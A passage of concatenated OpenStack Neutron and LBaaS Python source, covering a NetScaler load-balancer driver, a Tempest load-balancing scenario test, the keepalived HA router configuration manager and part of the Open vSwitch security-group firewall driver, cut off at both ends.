"%s/%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE, parent_pool_id, MEMBERS_RESOURCE) self.client.create_resource(context.tenant_id, resource_path, MEMBER_RESOURCE, ncc_member) def update_entity(self, context, old_member, member): parent_pool_id = member.pool.id update_member = self.payload_preparer.prepare_member_for_update(member) resource_path = "%s/%s/%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE, parent_pool_id, MEMBERS_RESOURCE, member.id) msg = (_("NetScaler driver member %(member_id)s " "update: %(member_obj)s") % {"member_id": old_member.id, "member_obj": repr(member)}) LOG.debug(msg) self.client.update_resource(context.tenant_id, resource_path, MEMBER_RESOURCE, update_member) def delete_entity(self, context, member): """Delete a member on a NetScaler device.""" parent_pool_id = member.pool.id resource_path = "%s/%s/%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE, parent_pool_id, MEMBERS_RESOURCE, member.id) msg = _("NetScaler driver member removal: %s") % member.id LOG.debug(msg) self.client.remove_resource(context.tenant_id, resource_path) class NetScalerHealthMonitorManager(NetScalerCommonManager, driver_base.BaseHealthMonitorManager): def __init__(self, driver): driver_base.BaseHealthMonitorManager.__init__(self, driver) NetScalerCommonManager.__init__(self, driver) def create_entity(self, context, hm): ncc_hm = self.payload_preparer.prepare_healthmonitor_for_creation(hm) msg = _("NetScaler driver healthmonitor creation: %s") % repr(ncc_hm) LOG.debug(msg) resource_path = "%s/%s" % (RESOURCE_PREFIX, MONITORS_RESOURCE) self.client.create_resource(context.tenant_id, resource_path, MONITOR_RESOURCE, ncc_hm) def update_entity(self, context, old_healthmonitor, hm): update_hm = self.payload_preparer.prepare_healthmonitor_for_update(hm) resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, MONITORS_RESOURCE, hm.id) msg = (_("NetScaler driver healthmonitor %(healthmonitor_id)s " "update: %(healthmonitor_obj)s") % {"healthmonitor_id": old_healthmonitor.id, "healthmonitor_obj": repr(hm)}) LOG.debug(msg) self.client.update_resource(context.tenant_id, resource_path, MONITOR_RESOURCE, update_hm) def delete_entity(self, context, hm): """Delete a healthmonitor on a NetScaler device.""" resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, MONITORS_RESOURCE, hm.id) msg = _("NetScaler driver healthmonitor removal: %s") % hm.id LOG.debug(msg) self.client.remove_resource(context.tenant_id, resource_path) class PayloadPreparer(object): def prepare_lb_for_creation(self, lb): creation_attrs = { 'id': lb.id, 'tenant_id': lb.tenant_id, 'vip_address': lb.vip_address, 'vip_subnet_id': lb.vip_subnet_id, } update_attrs = self.prepare_lb_for_update(lb) creation_attrs.update(update_attrs) return creation_attrs def prepare_lb_for_update(self, lb): return { 'name': lb.name, 'description': lb.description, 'admin_state_up': lb.admin_state_up, } def prepare_listener_for_creation(self, listener): creation_attrs = { 'id': listener.id, 'tenant_id': listener.tenant_id, 'protocol': listener.protocol, 'protocol_port': listener.protocol_port, 'loadbalancer_id': listener.loadbalancer_id } update_attrs = self.prepare_listener_for_update(listener) creation_attrs.update(update_attrs) return creation_attrs def prepare_listener_for_update(self, listener): sni_container_ids = self.prepare_sni_container_ids(listener) listener_dict = { 'name': listener.name, 'description': listener.description, 'sni_container_ids': sni_container_ids, 'default_tls_container_id': listener.default_tls_container_id, 'connection_limit': listener.connection_limit, 'admin_state_up': listener.admin_state_up } return listener_dict def prepare_pool_for_creation(self, pool): create_attrs = { 'id': pool.id, 'tenant_id': pool.tenant_id, 'listener_id': pool.listener.id, 'protocol': pool.protocol, } update_attrs = self.prepare_pool_for_update(pool) create_attrs.update(update_attrs) return create_attrs def prepare_pool_for_update(self, pool): update_attrs = { 'name': pool.name, 'description': pool.description, 'lb_algorithm': pool.lb_algorithm, 'admin_state_up': pool.admin_state_up } if pool.session_persistence: peristence = pool.session_persistence peristence_payload = self.prepare_sessionpersistence(peristence) update_attrs['session_persistence'] = peristence_payload return update_attrs def prepare_sessionpersistence(self, persistence): return { 'type': persistence.type, 'cookie_name': persistence.cookie_name } def prepare_members_for_pool(self, members): members_attrs = [] for member in members: member_attrs = self.prepare_member_for_creation(member) members_attrs.append(member_attrs) return members_attrs def prepare_member_for_creation(self, member): creation_attrs = { 'id': member.id, 'tenant_id': member.tenant_id, 'address': member.address, 'protocol_port': member.protocol_port, 'subnet_id': member.subnet_id } update_attrs = self.prepare_member_for_update(member) creation_attrs.update(update_attrs) return creation_attrs def prepare_member_for_update(self, member): return { 'weight': member.weight, 'admin_state_up': member.admin_state_up, } def prepare_healthmonitor_for_creation(self, health_monitor): creation_attrs = { 'id': health_monitor.id, 'tenant_id': health_monitor.tenant_id, 'pool_id': health_monitor.pool.id, 'type': health_monitor.type, } update_attrs = self.prepare_healthmonitor_for_update(health_monitor) creation_attrs.update(update_attrs) return creation_attrs def prepare_healthmonitor_for_update(self, health_monitor): ncc_hm = { 'delay': health_monitor.delay, 'timeout': health_monitor.timeout, 'max_retries': health_monitor.max_retries, 'admin_state_up': health_monitor.admin_state_up, } if health_monitor.type in ['HTTP', 'HTTPS']: ncc_hm['http_method'] = health_monitor.http_method ncc_hm['url_path'] = health_monitor.url_path ncc_hm['expected_codes'] = health_monitor.expected_codes return ncc_hm def get_network_info(self, context, plugin, subnet_id): network_info = {} subnet = plugin.db._core_plugin.get_subnet(context, subnet_id) network_id = subnet['network_id'] network = plugin.db._core_plugin.get_network(context, network_id) network_info['network_id'] = network_id network_info['subnet_id'] = subnet_id if PROV_NET_TYPE in network: network_info['network_type'] = network[PROV_NET_TYPE] if PROV_SEGMT_ID in network: network_info['segmentation_id'] = network[PROV_SEGMT_ID] return network_info def prepare_sni_container_ids(self, listener): sni_container_ids = [] for sni_container in listener.sni_containers: sni_container_ids.append(sni_container.tls_container_id) return sni_container_ids class NetScalerStatusService(service.Service): def __init__(self, driver): super(NetScalerStatusService, self).__init__() self.driver = driver def start(self): super(NetScalerStatusService, self).start() self.tg.add_timer( int(self.driver.periodic_task_interval), self.driver.collect_provision_status, None ) ``` #### File: v2/scenario/test_load_balancer_basic.py ```python from tempest import test from neutron_lbaas.tests.tempest.v2.scenario import base class TestLoadBalancerBasic(base.BaseTestCase): @test.services('compute', 'network') def test_load_balancer_basic(self): """This test checks basic load balancing. The following is the scenario outline: 1. Create an instance. 2. SSH to the instance and start two servers. 3. Create a load balancer with two members and with ROUND_ROBIN algorithm. 4. Associate the VIP with a floating ip. 5. Send NUM requests to the floating ip and check that they are shared between the two servers. """ self._create_server('server1') self._start_servers() self._create_load_balancer() self._check_load_balancing() ```
{ "source": "2020human/neutron", "score": 2 }
#### File: agent/linux/keepalived.py ```python import errno import itertools import os import netaddr from neutron_lib import exceptions from neutron_lib.utils import file as file_utils from oslo_config import cfg from oslo_log import log as logging from oslo_utils import fileutils from neutron._i18n import _, _LE from neutron.agent.linux import external_process from neutron.common import constants VALID_STATES = ['MASTER', 'BACKUP'] VALID_AUTH_TYPES = ['AH', 'PASS'] HA_DEFAULT_PRIORITY = 50 PRIMARY_VIP_RANGE_SIZE = 24 KEEPALIVED_SERVICE_NAME = 'keepalived' KEEPALIVED_EMAIL_FROM = '<EMAIL>' KEEPALIVED_ROUTER_ID = 'neutron' GARP_MASTER_DELAY = 60 LOG = logging.getLogger(__name__) def get_free_range(parent_range, excluded_ranges, size=PRIMARY_VIP_RANGE_SIZE): """Get a free IP range, from parent_range, of the specified size. :param parent_range: String representing an IP range. E.g: '169.254.0.0/16' :param excluded_ranges: A list of strings to be excluded from parent_range :param size: What should be the size of the range returned? :return: A string representing an IP range """ free_cidrs = netaddr.IPSet([parent_range]) - netaddr.IPSet(excluded_ranges) for cidr in free_cidrs.iter_cidrs(): if cidr.prefixlen <= size: return '%s/%s' % (cidr.network, size) raise ValueError(_('Network of size %(size)s, from IP range ' '%(parent_range)s excluding IP ranges ' '%(excluded_ranges)s was not found.') % {'size': size, 'parent_range': parent_range, 'excluded_ranges': excluded_ranges}) class InvalidInstanceStateException(exceptions.NeutronException): message = _('Invalid instance state: %(state)s, valid states are: ' '%(valid_states)s') def __init__(self, **kwargs): if 'valid_states' not in kwargs: kwargs['valid_states'] = ', '.join(VALID_STATES) super(InvalidInstanceStateException, self).__init__(**kwargs) class InvalidAuthenticationTypeException(exceptions.NeutronException): message = _('Invalid authentication type: %(auth_type)s, ' 'valid types are: %(valid_auth_types)s') def __init__(self, **kwargs): if 'valid_auth_types' not in kwargs: kwargs['valid_auth_types'] = ', '.join(VALID_AUTH_TYPES) super(InvalidAuthenticationTypeException, self).__init__(**kwargs) class KeepalivedVipAddress(object): """A virtual address entry of a keepalived configuration.""" def __init__(self, ip_address, interface_name, scope=None): self.ip_address = ip_address self.interface_name = interface_name self.scope = scope def __eq__(self, other): return (isinstance(other, KeepalivedVipAddress) and self.ip_address == other.ip_address) def __str__(self): return '[%s, %s, %s]' % (self.ip_address, self.interface_name, self.scope) def build_config(self): result = '%s dev %s' % (self.ip_address, self.interface_name) if self.scope: result += ' scope %s' % self.scope return result class KeepalivedVirtualRoute(object): """A virtual route entry of a keepalived configuration.""" def __init__(self, destination, nexthop, interface_name=None, scope=None): self.destination = destination self.nexthop = nexthop self.interface_name = interface_name self.scope = scope def build_config(self): output = self.destination if self.nexthop: output += ' via %s' % self.nexthop if self.interface_name: output += ' dev %s' % self.interface_name if self.scope: output += ' scope %s' % self.scope return output class KeepalivedInstanceRoutes(object): def __init__(self): self.gateway_routes = [] self.extra_routes = [] self.extra_subnets = [] def remove_routes_on_interface(self, interface_name): self.gateway_routes = [gw_rt for gw_rt in self.gateway_routes if gw_rt.interface_name != interface_name] # NOTE(amuller): extra_routes are initialized from the router's # 'routes' attribute. These routes do not have an interface # parameter and so cannot be removed via an interface_name lookup. self.extra_subnets = [route for route in self.extra_subnets if route.interface_name != interface_name] @property def routes(self): return self.gateway_routes + self.extra_routes + self.extra_subnets def __len__(self): return len(self.routes) def build_config(self): return itertools.chain([' virtual_routes {'], (' %s' % route.build_config() for route in self.routes), [' }']) class KeepalivedInstance(object): """Instance section of a keepalived configuration.""" def __init__(self, state, interface, vrouter_id, ha_cidrs, priority=HA_DEFAULT_PRIORITY, advert_int=None, mcast_src_ip=None, nopreempt=False, garp_master_delay=GARP_MASTER_DELAY): self.name = 'VR_%s' % vrouter_id if state not in VALID_STATES: raise InvalidInstanceStateException(state=state) self.state = state self.interface = interface self.vrouter_id = vrouter_id self.priority = priority self.nopreempt = nopreempt self.advert_int = advert_int self.mcast_src_ip = mcast_src_ip self.garp_master_delay = garp_master_delay self.track_interfaces = [] self.vips = [] self.virtual_routes = KeepalivedInstanceRoutes() self.authentication = None self.primary_vip_range = get_free_range( parent_range=constants.PRIVATE_CIDR_RANGE, excluded_ranges=[constants.METADATA_CIDR, constants.DVR_FIP_LL_CIDR] + ha_cidrs, size=PRIMARY_VIP_RANGE_SIZE) def set_authentication(self, auth_type, password): if auth_type not in VALID_AUTH_TYPES: raise InvalidAuthenticationTypeException(auth_type=auth_type) self.authentication = (auth_type, password) def add_vip(self, ip_cidr, interface_name, scope): vip = KeepalivedVipAddress(ip_cidr, interface_name, scope) if vip not in self.vips: self.vips.append(vip) else: LOG.debug('VIP %s already present in %s', vip, self.vips) def remove_vips_vroutes_by_interface(self, interface_name): self.vips = [vip for vip in self.vips if vip.interface_name != interface_name] self.virtual_routes.remove_routes_on_interface(interface_name) def remove_vip_by_ip_address(self, ip_address): self.vips = [vip for vip in self.vips if vip.ip_address != ip_address] def get_existing_vip_ip_addresses(self, interface_name): return [vip.ip_address for vip in self.vips if vip.interface_name == interface_name] def _build_track_interface_config(self): return itertools.chain( [' track_interface {'], (' %s' % i for i in self.track_interfaces), [' }']) def get_primary_vip(self): """Return an address in the primary_vip_range CIDR, with the router's VRID in the host section. For example, if primary_vip_range is 169.254.0.0/24, and this router's VRID is 5, the result is 169.254.0.5. Using the VRID assures that the primary VIP is consistent amongst HA router instances on different nodes. """ ip = (netaddr.IPNetwork(self.primary_vip_range).network + self.vrouter_id) return str(netaddr.IPNetwork('%s/%s' % (ip, PRIMARY_VIP_RANGE_SIZE))) def _build_vips_config(self): # NOTE(amuller): The primary VIP must be consistent in order to avoid # keepalived bugs. Changing the VIP in the 'virtual_ipaddress' and # SIGHUP'ing keepalived can remove virtual routers, including the # router's default gateway. # We solve this by never changing the VIP in the virtual_ipaddress # section, herein known as the primary VIP. # The only interface known to exist for HA routers is the HA interface # (self.interface). We generate an IP on that device and use it as the # primary VIP. The other VIPs (Internal interfaces IPs, the external # interface IP and floating IPs) are placed in the # virtual_ipaddress_excluded section. primary = KeepalivedVipAddress(self.get_primary_vip(), self.interface) vips_result = [' virtual_ipaddress {', ' %s' % primary.build_config(), ' }'] if self.vips: vips_result.extend( itertools.chain([' virtual_ipaddress_excluded {'], (' %s' % vip.build_config() for vip in sorted(self.vips, key=lambda vip: vip.ip_address)), [' }'])) return vips_result def _build_virtual_routes_config(self): return itertools.chain([' virtual_routes {'], (' %s' % route.build_config() for route in self.virtual_routes), [' }']) def build_config(self): config = ['vrrp_instance %s {' % self.name, ' state %s' % self.state, ' interface %s' % self.interface, ' virtual_router_id %s' % self.vrouter_id, ' priority %s' % self.priority, ' garp_master_delay %s' % self.garp_master_delay] if self.nopreempt: config.append(' nopreempt') if self.advert_int: config.append(' advert_int %s' % self.advert_int) if self.authentication: auth_type, password = self.authentication authentication = [' authentication {', ' auth_type %s' % auth_type, ' auth_pass %s' % password, ' }'] config.extend(authentication) if self.mcast_src_ip: config.append(' mcast_src_ip %s' % self.mcast_src_ip) if self.track_interfaces: config.extend(self._build_track_interface_config()) config.extend(self._build_vips_config()) if len(self.virtual_routes): config.extend(self.virtual_routes.build_config()) config.append('}') return config class KeepalivedConf(object): """A keepalived configuration.""" def __init__(self): self.reset() def reset(self): self.instances = {} def add_instance(self, instance): self.instances[instance.vrouter_id] = instance def get_instance(self, vrouter_id): return self.instances.get(vrouter_id) def build_config(self): config = ['global_defs {', ' notification_email_from %s' % KEEPALIVED_EMAIL_FROM, ' router_id %s' % KEEPALIVED_ROUTER_ID, '}' ] for instance in self.instances.values(): config.extend(instance.build_config()) return config def get_config_str(self): """Generates and returns the keepalived configuration. :return: Keepalived configuration string. """ return '\n'.join(self.build_config()) class KeepalivedManager(object): """Wrapper for keepalived. This wrapper permits to write keepalived config files, to start/restart keepalived process. """ def __init__(self, resource_id, config, process_monitor, conf_path='/tmp', namespace=None): self.resource_id = resource_id self.config = config self.namespace = namespace self.process_monitor = process_monitor self.conf_path = conf_path def get_conf_dir(self): confs_dir = os.path.abspath(os.path.normpath(self.conf_path)) conf_dir = os.path.join(confs_dir, self.resource_id) return conf_dir def get_full_config_file_path(self, filename, ensure_conf_dir=True): conf_dir = self.get_conf_dir() if ensure_conf_dir: fileutils.ensure_tree(conf_dir, mode=0o755) return os.path.join(conf_dir, filename) def _output_config_file(self): config_str = self.config.get_config_str() config_path = self.get_full_config_file_path('keepalived.conf') file_utils.replace_file(config_path, config_str) return config_path @staticmethod def _safe_remove_pid_file(pid_file): try: os.remove(pid_file) except OSError as e: if e.errno != errno.ENOENT: LOG.error(_LE("Could not delete file %s, keepalived can " "refuse to start."), pid_file) def get_vrrp_pid_file_name(self, base_pid_file): return '%s-vrrp' % base_pid_file def get_conf_on_disk(self): config_path = self.get_full_config_file_path('keepalived.conf') try: with open(config_path) as conf: return conf.read() except (OSError, IOError) as e: if e.errno != errno.ENOENT: raise def spawn(self): config_path = self._output_config_file() keepalived_pm = self.get_process() vrrp_pm = self._get_vrrp_process( self.get_vrrp_pid_file_name(keepalived_pm.get_pid_file_name())) keepalived_pm.default_cmd_callback = ( self._get_keepalived_process_callback(vrrp_pm, config_path)) keepalived_pm.enable(reload_cfg=True) self.process_monitor.register(uuid=self.resource_id, service_name=KEEPALIVED_SERVICE_NAME, monitored_process=keepalived_pm) LOG.debug('Keepalived spawned with config %s', config_path) def disable(self): self.process_monitor.unregister(uuid=self.resource_id, service_name=KEEPALIVED_SERVICE_NAME) pm = self.get_process() pm.disable(sig='15') def get_process(self): return external_process.ProcessManager( cfg.CONF, self.resource_id, self.namespace, pids_path=self.conf_path) def _get_vrrp_process(self, pid_file): return external_process.ProcessManager( cfg.CONF, self.resource_id, self.namespace, pid_file=pid_file) def _get_keepalived_process_callback(self, vrrp_pm, config_path): def callback(pid_file): # If keepalived process crashed unexpectedly, the vrrp process # will be orphan and prevent keepalived process to be spawned. # A check here will let the l3-agent to kill the orphan process # and spawn keepalived successfully. if vrrp_pm.active: vrrp_pm.disable() self._safe_remove_pid_file(pid_file) self._safe_remove_pid_file(self.get_vrrp_pid_file_name(pid_file)) cmd = ['keepalived', '-P', '-f', config_path, '-p', pid_file, '-r', self.get_vrrp_pid_file_name(pid_file)] return cmd return callback ``` #### File: linux/openvswitch_firewall/firewall.py ```python import netaddr from neutron_lib import constants as lib_const from neutron_lib import exceptions from oslo_log import log as logging from oslo_utils import netutils from neutron._i18n import _, _LE, _LW from neutron.agent import firewall from neutron.agent.linux.openvswitch_firewall import constants as ovsfw_consts from neutron.agent.linux.openvswitch_firewall import rules from neutron.common import constants from neutron.plugins.ml2.drivers.openvswitch.agent.common import constants \ as ovs_consts LOG = logging.getLogger(__name__) def _replace_register(flow_params, register_number, register_value): """Replace value from flows to given register number 'register_value' key in dictionary will be replaced by register number given by 'register_number' :param flow_params: Dictionary containing defined flows :param register_number: The number of register where value will be stored :param register_value: Key to be replaced by register number """ try: reg_port = flow_params[register_value] del flow_params[register_value] flow_params['reg{:d}'.format(register_number)] = reg_port except KeyError: pass def create_reg_numbers(flow_params): """Replace reg_(port|net) values with defined register numbers""" _replace_register(flow_params, ovsfw_consts.REG_PORT, 'reg_port') _replace_register(flow_params, ovsfw_consts.REG_NET, 'reg_net') class OVSFWPortNotFound(exceptions.NeutronException): message = _("Port %(port_id)s is not managed by this agent. ") class SecurityGroup(object): def __init__(self, id_): self.id = id_ self.raw_rules = [] self.remote_rules = [] self.members = {} self.ports = set() def update_rules(self, rules): """Separate raw and remote rules.""" self.raw_rules = [rule for rule in rules if 'remote_group_id' not in rule] self.remote_rules = [rule for rule in rules if 'remote_group_id' in rule] def get_ethertype_filtered_addresses(self, ethertype, exclude_addresses=None): exclude_addresses = set(exclude_addresses) or set() group_addresses = set(self.members.get(ethertype, [])) return list(group_addresses - exclude_addresses) class OFPort(object): def __init__(self, port_dict, ovs_port, vlan_tag): self.id = port_dict['device'] self.vlan_tag = vlan_tag self.mac = ovs_port.vif_mac self.lla_address = str(netutils.get_ipv6_addr_by_EUI64( lib_const.IPv6_LLA_PREFIX, self.mac)) self.ofport = ovs_port.ofport self.sec_groups = list() self.fixed_ips = port_dict.get('fixed_ips', []) self.neutron_port_dict = port_dict.copy() self.allowed_pairs_v4 = self._get_allowed_pairs(port_dict, version=4) self.allowed_pairs_v6 = self._get_allowed_pairs(port_dict, version=6) @staticmethod def _get_allowed_pairs(port_dict, version): aap_dict = port_dict.get('allowed_address_pairs', set()) return {(aap['mac_address'], aap['ip_address']) for aap in aap_dict if netaddr.IPAddress(aap['ip_address']).version == version} @property def ipv4_addresses(self): return [ip_addr for ip_addr in self.fixed_ips if netaddr.IPAddress(ip_addr).version == 4] @property def ipv6_addresses(self): return [ip_addr for ip_addr in self.fixed_ips if netaddr.IPAddress(ip_addr).version == 6] def update(self, port_dict): self.allowed_pairs_v4 = self._get_allowed_pairs(port_dict, version=4) self.allowed_pairs_v6 = self._get_allowed_pairs(port_dict, version=6) # Neighbour discovery uses LLA self.allowed_pairs_v6.add((self.mac, self.lla_address)) self.fixed_ips = port_dict.get('fixed_ips', []) self.neutron_port_dict = port_dict.copy() class SGPortMap(object): def __init__(self): self.ports = {} self.sec_groups = {} def get_or_create_sg(self, sg_id): try: sec_group = self.sec_groups[sg_id] except KeyError: sec_group = SecurityGroup(sg_id) self.sec_groups[sg_id] = sec_group return sec_group def create_port(self, port, port_dict): self.ports[port.id] = port self.update_port(port, port_dict) def update_port(self, port, port_dict): for sec_group in self.sec_groups.values(): sec_group.ports.discard(port) port.sec_groups = [self.get_or_create_sg(sg_id) for sg_id in port_dict['security_groups']] for sec_group in port.sec_groups: sec_group.ports.add(port) port.update(port_dict) def remove_port(self, port): for sec_group in port.sec_groups: sec_group.ports.discard(port) del self.ports[port.id] def update_rules(self, sg_id, rules): sec_group = self.get_or_create_sg(sg_id) sec_group.update_rules(rules) def update_members(self, sg_id, members): sec_group = self.get_or_create_sg(sg_id) sec_group.members = members class OVSFirewallDriver(firewall.FirewallDriver): REQUIRED_PROTOCOLS = [ ovs_consts.OPENFLOW10, ovs_consts.OPENFLOW11, ovs_consts.OPENFLOW12, ovs_consts.OPENFLOW13, ovs_consts.OPENFLOW14, ] provides_arp_spoofing_protection = True def __init__(self, integration_bridge): """Initialize object :param integration_bridge: Bridge on which openflow rules will be applied """ self.int_br = self.initialize_bridge(integration_bridge) self.sg_port_map = SGPortMap() self._deferred = False self._drop_all_unmatched_flows() def security_group_updated(self, action_type, sec_group_ids, device_ids=None): """The current driver doesn't make use of this method. It exists here to avoid NotImplementedError raised from the parent class's method. """ def _accept_flow(self, **flow): flow['ct_state'] = ovsfw_consts.OF_STATE_ESTABLISHED_NOT_REPLY self._add_flow(**flow) flow['ct_state'] = ovsfw_consts.OF_STATE_NEW_NOT_ESTABLISHED if flow['table'] == ovs_consts.RULES_INGRESS_TABLE: flow['actions'] = ( 'ct(commit,zone=NXM_NX_REG{:d}[0..15]),{:s}'.format( ovsfw_consts.REG_NET, flow['actions'])) self._add_flow(**flow) def _add_flow(self, **kwargs): dl_type = kwargs.get('dl_type') create_reg_numbers(kwargs) if isinstance(dl_type, int): kwargs['dl_type'] = "0x{:04x}".format(dl_type) if self._deferred: self.int_br.add_flow(**kwargs) else: self.int_br.br.add_flow(**kwargs) def _delete_flows(self, **kwargs): create_reg_numbers(kwargs) if self._deferred: self.int_br.delete_flows(**kwargs) else: self.int_br.br.delete_flows(**kwargs) @staticmethod def initialize_bridge(int_br): int_br.set_protocols(OVSFirewallDriver.REQUIRED_PROTOCOLS) return int_br.deferred(full_ordered=True) def _drop_all_unmatched_flows(self): for table in ovs_consts.OVS_FIREWALL_TABLES: self.int_br.br.add_flow(table=table, priority=0, actions='drop') def get_or_create_ofport(self, port): port_id = port['device'] try: of_port = self.sg_port_map.ports[port_id] except KeyError: ovs_port = self.int_br.br.get_vif_port_by_id(port_id) if not ovs_port: raise OVSFWPortNotFound(port_id=port_id) try: other_config = self.int_br.br.db_get_val( 'Port', ovs_port.port_name, 'other_config') port_vlan_id = int(other_config['tag']) except (KeyError, TypeError): LOG.warning(_LW("Cannot get tag for port %(port_id)s from " "its other_config: %(other_config)s"), {'port_id': port_id, 'other_config': other_config}) port_vlan_id = ovs_consts.DEAD_VLAN_TAG of_port = OFPort(port, ovs_port, port_vlan_id) self.sg_port_map.create_port(of_port, port) else: self.sg_port_map.update_port(of_port, port) return of_port def is_port_managed(self, port): return port['device'] in self.sg_port_map.ports def prepare_port_filter(self, port): if not firewall.port_sec_enabled(port): return port_exists = self.is_port_managed(port) of_port = self.get_or_create_ofport(port) if port_exists: LOG.error(_LE("Initializing port %s that was already " "initialized."), port['device']) self.delete_all_port_flows(of_port) self.initialize_port_flows(of_port) self.add_flows_from_rules(of_port) def update_port_filter(self, port): """Update rules for given port Current existing filtering rules are removed and new ones are generated based on current loaded security group rules and members. """ if not firewall.port_sec_enabled(port): self.remove_port_filter(port) return elif not self.is_port_managed(port): self.prepare_port_filter(port) return of_port = self.get_or_create_ofport(port) # TODO(jlibosva): Handle firewall blink self.delete_all_port_flows(of_port) self.initialize_port_flows(of_port) self.add_flows_from_rules(of_port) def remove_port_filter(self, port): """Remove port from firewall All flows related to this port are removed from ovs. Port is also removed from ports managed by this firewall. """ if self.is_port_managed(port): of_port = self.get_or_create_ofport(port) self.delete_all_port_flows(of_port) self.sg_port_map.remove_port(of_port) def update_security_group_rules(self, sg_id, rules): self.sg_port_map.update_rules(sg_id, rules) def update_security_group_members(self, sg_id, member_ips): self.sg_port_map.update_members(sg_id, member_ips) def filter_defer_apply_on(self): self._deferred = True def filter_defer_apply_off(self): if self._deferred: self.int_br.apply_flows() self._deferred = False @property def ports(self): return {id_: port.neutron_port_dict for id_, port in self.sg_port_map.ports.items()} def initialize_port_flows(self, port): """Set base flows for port :param port: OFPort instance """ # Identify egress flow self._add_flow( table=ovs_consts.LOCAL_SWITCHING, priority=100, in_port=port.ofport, actions='set_field:{:d}->reg{:d},' 'set_field:{:d}->reg{:d},' 'resubmit(,{:d})'.format( port.ofport, ovsfw_consts.REG_PORT, port.vlan_tag, ovsfw_consts.REG_NET, ovs_consts.BASE_EGRESS_TABLE) ) # Identify ingress flows after egress filtering self._add_flow( table=ovs_consts.LOCAL_SWITCHING, priority=90, dl_dst=port.mac, actions='set_field:{:d}->reg{:d},' 'set_field:{:d}->reg{:d},' 'resubmit(,{:d})'.format( port.ofport, ovsfw_consts.REG_PORT, port.vlan_tag, ovsfw_consts.REG_NET, ovs_consts.BASE_INGRESS_TABLE), ) self._initialize_egress(port) self._initialize_ingress(port) def _initialize_egress_ipv6_icmp(self, port): for icmp_type in firewall.ICMPV6_ALLOWED_TYPES: self._add_flow( table=ovs_consts.BASE_EGRESS_TABLE, priority=95, in_port=port.ofport, reg_port=port.ofport, dl_type=constants.ETHERTYPE_IPV6, nw_proto=lib_const.PROTO_NUM_IPV6_ICMP, icmp_type=icmp_type, actions='normal' ) def _initialize_egress(self, port): """Identify egress traffic and send it to egress base""" self._initialize_egress_ipv6_icmp(port) # Apply mac/ip pairs for IPv4 allowed_pairs = port.allowed_pairs_v4.union( {(port.mac, ip_addr) for ip_addr in port.ipv4_addresses}) for mac_addr, ip_addr in allowed_pairs: self._add_flow( table=ovs_consts.BASE_EGRESS_TABLE, priority=95, in_port=port.ofport, reg_port=port.ofport, dl_src=mac_addr, dl_type=constants.ETHERTYPE_ARP, arp_spa=ip_addr, actions='normal' ) self._add_flow( table=ovs_consts.BASE_EGRESS_TABLE, priority=65, reg_port=port.ofport, ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED, dl_type=constants.ETHERTYPE_IP, in_port=port.ofport, dl_src=mac_addr, nw_src=ip_addr, actions='ct(table={:d},zone=NXM_NX_REG{:d}[0..15])'.format( ovs_consts.RULES_EGRESS_TABLE, ovsfw_consts.REG_NET) ) # Apply mac/ip pairs for IPv6 allowed_pairs = port.allowed_pairs_v6.union( {(port.mac, ip_addr) for ip_addr in port.ipv6_addresses}) for mac_addr, ip_addr in allowed_pairs: self._add_flow( table=ovs_consts.BASE_EGRESS_TABLE, priority=65, reg_port=port.ofport, in_port=port.ofport, ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED, dl_type=constants.ETHERTYPE_IPV6, dl_src=mac_addr, ipv6_src=ip_addr, actions='ct(table={:d},zone=NXM_NX_REG{:d}[0..15])'.format( ovs_consts.RULES_EGRESS_TABLE, ovsfw_consts.REG_NET) ) # DHCP discovery for dl_type, src_port, dst_port in ( (constants.ETHERTYPE_IP, 68, 67), (constants.ETHERTYPE_IPV6, 546, 547)): self._add_flow( table=ovs_consts.BASE_EGRESS_TABLE, priority=80, reg_port=port.ofport, in_port=port.ofport, dl_type=dl_type, nw_proto=lib_const.PROTO_NUM_UDP, tp_src=src_port, tp_dst=dst_port, actions='resubmit(,{:d})'.format( ovs_consts.ACCEPT_OR_INGRESS_TABLE) ) # Ban dhcp service running on an instance for dl_type, src_port, dst_port in ( (constants.ETHERTYPE_IP, 67, 68), (constants.ETHERTYPE_IPV6, 547, 546)): self._add_flow( table=ovs_consts.BASE_EGRESS_TABLE, priority=70, in_port=port.ofport, reg_port=port.ofport, dl_type=dl_type, nw_proto=lib_const.PROTO_NUM_UDP, tp_src=src_port, tp_dst=dst_port, actions='drop' ) # Drop all remaining not tracked egress connections self._add_flow( table=ovs_consts.BASE_EGRESS_TABLE, priority=10, ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED, in_port=port.ofport, reg_port=port.ofport, actions='drop' ) # Fill in accept_or_ingress table by checking that traffic is ingress # and if not, accept it self._add_flow( table=ovs_consts.ACCEPT_OR_INGRESS_TABLE, priority=100, dl_dst=port.mac, actions='set_field:{:d}->reg{:d},resubmit(,{:d})'.format( port.ofport, ovsfw_consts.REG_PORT, ovs_consts.BASE_INGRESS_TABLE), ) for ethertype in [constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6]: self._add_flow( table=ovs_consts.ACCEPT_OR_INGRESS_TABLE, priority=90, dl_type=ethertype, reg_port=port.ofport, ct_state=ovsfw_consts.OF_STATE_NEW_NOT_ESTABLISHED, actions='ct(commit,zone=NXM_NX_REG{:d}[0..15]),normal'.format( ovsfw_consts.REG_NET) ) self._add_flow( table=ovs_consts.ACCEPT_OR_INGRESS_TABLE, priority=80, reg_port=port.ofport, actions='normal' ) def _initialize_tracked_egress(self, port): # Drop invalid packets self._add_flow( table=ovs_consts.RULES_EGRESS_TABLE, priority=50, ct_state=ovsfw_consts.OF_STATE_INVALID, actions='drop' ) # Drop traffic for removed sg rules self._add_flow( table=ovs_consts.RULES_EGRESS_TABLE, priority=50, reg_port=port.ofport, ct_mark=ovsfw_consts.CT_MARK_INVALID, actions='drop' ) for state in ( ovsfw_consts.OF_STATE_ESTABLISHED_REPLY, ovsfw_consts.OF_STATE_RELATED, ): self._add_flow( table=ovs_consts.RULES_EGRESS_TABLE, priority=50, ct_state=state, ct_mark=ovsfw_consts.CT_MARK_NORMAL, reg_port=port.ofport, ct_zone=port.vlan_tag, actions='normal' ) self._add_flow( table=ovs_consts.RULES_EGRESS_TABLE, priority=40, reg_port=port.ofport, ct_state=ovsfw_consts.OF_STATE_NOT_ESTABLISHED, actions='drop' ) for ethertype in 